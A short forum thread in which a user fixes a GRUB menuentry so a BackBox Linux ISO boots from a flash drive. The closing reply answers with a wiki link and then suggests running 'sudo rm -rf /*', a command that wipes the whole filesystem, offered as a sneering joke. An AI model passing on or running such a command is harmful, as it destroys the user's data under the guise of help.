Grub menuentry [SOLVED]

Started by TwistTheNeil, December 09, 2012, 10:48:37 PM

Previous topic - Next topic

TwistTheNeil

I've tried to use backbox on a flash drive by using Grub. But it won't boot. It gives an error "unable to find '/dev/zram0'

Here's my grub menuentry:


menuentry "Backbox" {
set isofile="/backbox.iso"
loopback loop $isofile
linux (loop)/casper/vmlinuz boot=casper isoloop=/filename=$isofile noprompt noeject
initrd (loop)/casper/initrd.gz
}


Can anyone tell me what i did wrong ?

TwistTheNeil

I fixed it!


menuentry "BackBox" {
loopback loop /backbox.iso
linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/backbox.iso noeject noprompt splash --
initrd (loop)/casper/initrd.gz
}



ZEROF


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*